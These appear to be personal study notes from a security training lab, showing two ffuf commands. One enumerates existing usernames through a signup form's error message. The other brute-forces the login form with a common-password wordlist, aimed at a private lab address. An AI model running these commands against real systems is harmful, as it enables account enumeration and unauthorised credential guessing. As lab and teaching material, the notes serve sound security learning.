Authentication - security

Fuzz for usernames that already exist

# -mr flag for detecting our desired output text
ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt \
-X POST -d "username=FUZZ&email=x&password=x&cpassword=x" \
-H "Content-Type: application/x-www-form-urlencoded" \
-u http://10.10.6.241/customers/signup -mr "username already exists"
        

Brute force authentication with ffuf

ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 \
-X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" \
-u http://10.10.6.241/customers/login -fc 200